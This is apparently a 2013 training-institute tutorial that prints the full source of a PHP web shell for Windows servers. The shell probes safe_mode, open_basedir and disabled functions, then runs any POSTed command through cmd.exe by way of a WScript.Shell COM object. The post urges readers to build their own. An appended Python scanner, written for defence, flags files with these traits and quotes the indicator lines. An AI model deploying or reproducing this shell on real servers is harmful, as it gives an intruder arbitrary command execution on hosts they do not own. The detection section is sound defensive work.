Filename | Breaking Windows Server Security through PHP |
Author | Unknown |
Date and Time | 7/16/2013 |
Label | Penetration |
Ethical Hacking Institute in Pune
./Arizona Team
Hello everyone. Continuing our series on website security, today we are going to see how Windows Server security can be broken through a simple piece of PHP code.
Go through the logical flow of the code and try to understand the logic behind it, then create a new one for yourself. If you have any difficulty following the logical flow of the PHP code, you can send your questions to instructor@arizonainfotech.com.
Here is the PHP Code:
<body bgcolor=black>
<center><font color=green>Team Arizona Server Security Breaker<font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>
<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>
<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
echo "<font color=whitepurple>PHP Version :</font><font color=red><b>$phpver</b></font><br>";
//phpver end--
?>
<p align="left">
<?php
//path of win
$dir = @getcwd();
echo "<font color=whitepurple>U'Re In :</font><font color=red><b>$dir</b></font><br>";
//end
?>
<?php
print "<form method=post>";
print "<b><font color=white>cmd:</b></font><input size=50 name='command' value=''>";
print "<br>";
print "<b><font color=white>file :</b></font><input size=50 name='file' value=''>";
print "<br>";
print "<input type=submit name=_act value='Execute!'>";
$post = $_POST['command'];
$file = $_POST['file'];
?>
<?php
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post.' > '.dirname($_SERVER[SCRIPT_FILENAME]).'/'.$file.'');
?>
www.arizonainfotech.com
CEH CHFI ECSA ENSA CCNA CCNA SECURITY MCITP RHCE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE
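For server owners, the following is an added example and not part of the original post: a small static scanner that flags PHP files showing the traits of the script above (a `COM("WScript.Shell")` object, a `Run` call, request input, and probes of `safe_mode`, `open_basedir` and `disable_functions`). The rule names, the verdict levels and both sample snippets are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Traits taken from the script on this page; rule names are made up for this example.
RULES = {
    "com_wscript_shell": re.compile(r"new\s+COM\s*\(\s*['\"]WScript\.Shell['\"]", re.I),
    "shell_run_call": re.compile(r"->\s*(Run|Exec)\s*\(", re.I),
    "request_input": re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "cmd_exe": re.compile(r"cmd(\.exe)?\s*/c", re.I),
    "config_probe": re.compile(
        r"ini_get\s*\(\s*['\"](safe_mode|open_basedir|disable_functions)['\"]", re.I),
}

def scan_source(text):
    """Return {rule name: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """'high' = shell object plus request input; request input alone is normal PHP."""
    if "com_wscript_shell" in hits and "request_input" in hits:
        return "high"
    strong = set(hits) - {"request_input"}
    return "review" if strong else "clean"

def scan_tree(root):
    """Scan every *.php file under root; yield (path, verdict, hits) for non-clean files."""
    for path in Path(root).rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        if verdict(hits) != "clean":
            yield str(path), verdict(hits), hits

# Constructed sample reproducing only the indicator lines of the page's script.
SAMPLE = '''<?php
$df = @ini_get('disable_functions');
$post = $_POST['command'];
$_file = new COM("WScript.Shell");
$_file ->Run('cmd.exe /c'.$post);
'''
BENIGN = '<?php echo htmlspecialchars($_GET["q"]); ?>'

if __name__ == "__main__":
    for item in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(item)
```

Run it with the web root as the only argument. A "review" verdict means a file matched one of the traits without the full combination and should be read by hand.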